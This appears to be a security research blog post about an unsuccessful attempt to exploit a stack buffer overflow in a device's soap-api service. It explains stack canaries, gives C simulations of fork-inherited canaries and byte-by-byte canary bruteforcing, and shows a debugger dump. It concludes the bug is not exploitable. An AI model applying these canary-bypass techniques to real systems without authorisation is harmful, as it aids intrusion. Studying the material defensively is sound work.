So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.

a primer on SSP

The Stack Smashing Protector (SSP) is a compiler feature specifically designed to detect stack-based buffer overflows and abort the program if one is detected, to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function, and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame. This means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.

For GCC’s -fstack-protector, for example:

This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.

It’s important to note one thing: this protection does not prevent overflows from happening. It’s only meant to detect them and to mitigate classic stack overflow exploitation. This means that any code that executes after the overflow has occurred, but before the canary is checked at the end of the function, can still be affected by the memory corruption. Modern implementations do a few things to mitigate this as well. They reorder variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted, and they place all buffers together in memory right before the canary and return address, which limits the scope of data that can be corrupted and increases the likelihood that an overflow overwrites the canary value.

Another important point is that the canary value is set once, when the process starts, so it remains the same for the entire lifetime of the process and is inherited by any children it forks. New processes started via the shell or execve() will have unique canaries.
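The fork behaviour can be sketched with a small POSIX C example. This is only a model: demo_guard is a hypothetical global standing in for the real canary, and rand() is used purely to get some value for the demo. The child reports the value it sees over a pipe so the parent can compare.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical per-process guard, standing in for the real canary. */
static uint32_t demo_guard;

/* Pick a guard once, as would happen at process start. */
void demo_guard_init(unsigned seed)
{
    srand(seed);
    demo_guard = (uint32_t)rand();
}

/* Fork and let the child report the guard it sees in its own address
 * space. Returns 1 if it matches the parent's, 0 if not, -1 on error. */
int child_inherits_guard(void)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: no re-initialization happens here, it just reports. */
        close(fds[0]);
        ssize_t w = write(fds[1], &demo_guard, sizeof demo_guard);
        _exit(w == (ssize_t)sizeof demo_guard ? 0 : 1);
    }

    /* Parent: read the child's view of the guard and compare. */
    close(fds[1]);
    uint32_t seen = 0;
    ssize_t r = read(fds[0], &seen, sizeof seen);
    close(fds[0]);
    waitpid(pid, NULL, 0);
    if (r != (ssize_t)sizeof seen)
        return -1;
    return seen == demo_guard;
}
```

After demo_guard_init(), child_inherits_guard() returns 1 because fork() duplicates the parent’s memory, guard included. A program started through execve() would instead run its own startup code and pick a new value.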

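I took a look at arch/arm/include/asm/stackprotector.h in the sources for the kernel used by the device (a custom fork of 3.14.77) and found this code, showing that on ARM the canary is initialized by XORing random bytes with the value of LINUX_VERSION_CODE. Strictly speaking, this routine seeds the canary used by the kernel’s own code, while a userland process like soap-api gets its canary from libc at startup, but the idea is the same: a random value chosen once at initialization.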

static __always_inline void boot_init_stack_canary(void)
{
	unsigned long canary;

	/* Try to get a semi random initial value. */
	get_random_bytes(&canary, sizeof(canary));
	canary ^= LINUX_VERSION_CODE;

	current->stack_canary = canary;
	__stack_chk_guard = current->stack_canary;
}
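To put a number on the constant involved, here is a small C sketch of the arithmetic. It assumes the vendor fork still reports itself as 3.14.77 and uses the usual (a << 16) + (b << 8) + c encoding of the kernel’s KERNEL_VERSION macro. The function names are made up for the example.

```c
#include <assert.h>
#include <stdint.h>

/* Same arithmetic as KERNEL_VERSION(a, b, c) in kernels of this era. */
uint32_t kernel_version_code(uint32_t a, uint32_t b, uint32_t c)
{
    return (a << 16) + (b << 8) + c;
}

/* XOR a random word with the version constant, mirroring the
 * "canary ^= LINUX_VERSION_CODE" step in boot_init_stack_canary(). */
uint32_t mix_canary(uint32_t random_word, uint32_t version_code)
{
    return random_word ^ version_code;
}
```

For 3.14.77 the constant works out to 0x030E4D (200269). XORing with a fixed, known constant is reversible, so it neither adds nor removes randomness; the strength of the value still comes entirely from get_random_bytes().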

bruteforcing? I guess…not

Generally speaking, there are two ways of going about bypassing the canary check:

Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
Bruteforce the canary byte-by-byte (only works under certain conditions)

Since I hadn’t found any way to leak memory, the only real option I had was bruteforcing. There’s a specific bruteforcing technique that greatly reduces the total number of attempts needed to determine the canary value: guess one byte at a time, use the lack of a crash as an oracle to tell when the correct byte has been guessed, and repeat this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g. read / recv). I found a few good resources that helped me better understand this concept, such as this LiveOverflow video and this CTF guide (screenshot below taken from here).

[screenshot: bruteforcing]
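The byte-at-a-time idea can be sketched as a self-contained C simulation. Nothing here talks to a real target: worker_survives() is a hypothetical oracle that models "the forked worker did not crash", and the sketch assumes both conditions hold (a stable canary and a write primitive that adds no terminator).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CANARY_LEN 4 /* 32-bit target */

/* Hypothetical oracle state: the secret canary and a call counter. */
static const uint8_t *oracle_secret;
static unsigned long oracle_calls;

/* Models a forked worker that survives only if every canary byte the
 * payload overwrote (the first n) matches the real value. */
static int worker_survives(const uint8_t *guess, size_t n)
{
    oracle_calls++;
    return memcmp(guess, oracle_secret, n) == 0;
}

/* Recover the canary one byte at a time. Returns the number of oracle
 * calls used, or 0 if some byte could not be found. */
unsigned long bruteforce_canary(const uint8_t secret[CANARY_LEN],
                                uint8_t out[CANARY_LEN])
{
    oracle_secret = secret;
    oracle_calls = 0;

    for (size_t i = 0; i < CANARY_LEN; i++) {
        int found = 0;
        for (unsigned v = 0; v < 256; v++) {
            out[i] = (uint8_t)v;
            /* Overwrite bytes 0..i only; the rest stay untouched. */
            if (worker_survives(out, i + 1)) {
                found = 1;
                break;
            }
        }
        if (!found)
            return 0;
    }
    return oracle_calls;
}
```

In this model the worst case is 4 × 256 = 1024 attempts for a 32-bit canary, compared with up to 2^32 when the whole word has to be guessed at once.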

Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.

The output below shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary, which has been overwritten by a single byte, and r3 containing the original. As you can see, the byte that was written was 00 (NULL): the function that reads the payload into the buffer (sscanf()) appends a NULL. So the requirement that the read not append a NULL byte isn’t met.

Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
r2             0xb710d200       3071332864
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 <__stack_chk_fail>
cpsr           0x80000010       -2147483632
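The single zeroed byte in r2 is what you would expect from a %s conversion, which always writes a terminating NUL after the data. A minimal C sketch of that effect follows, assuming a little-endian layout and a made-up 8-byte buffer. The "frame" is one array large enough for the write, so the demo itself never overflows anything.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

enum { BUF_LEN = 8, CANARY_LEN = 4 };

/* Returns the simulated canary after sscanf("%s") stores a token of
 * exactly BUF_LEN characters into the buffer in front of it. */
uint32_t canary_after_sscanf(uint32_t canary)
{
    /* One array models "buffer followed by canary". */
    char frame[BUF_LEN + CANARY_LEN];
    unsigned char *c = (unsigned char *)frame + BUF_LEN;

    /* Store the canary little-endian (assumed to match the target). */
    for (int i = 0; i < CANARY_LEN; i++)
        c[i] = (unsigned char)(canary >> (8 * i));

    /* The 8 characters fit in the buffer; the NUL terminator does not
     * and lands on the lowest-addressed canary byte. */
    int n = sscanf("AAAAAAAA", "%s", frame);
    assert(n == 1);

    /* Read the canary back in the same little-endian order. */
    uint32_t out = 0;
    for (int i = 0; i < CANARY_LEN; i++)
        out |= (uint32_t)c[i] << (8 * i);
    return out;
}
```

Feeding it the original value from r3 (0xb710d29e) gives 0xb710d200, the same pattern as the corrupted copy in r2. Because the terminator is always 00, the attacker has no control over the value of the last byte written, which is why a byte-by-byte guess is not possible through this path.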

Not only that, the canary value was changing between requests. In retrospect, this is obvious, since soap-api is not forking itself to handle the requests but is instead being execve’ed at some point after lighttpd forks.

So, yeah, (smarter) bruteforcing was out of the question. Since along the way I’d also learned that PIE and RELRO were enabled on the binary, I called it quits at this point, and I feel pretty confident in saying this isn’t an exploitable issue.

conclusion

This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.

Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.

references

Stack Canaries – Gingerly Sidestepping the Cage [2021]
LiveOverflow video
CTF guide on stack canaries
Bruteforcing x86 Stack Canaries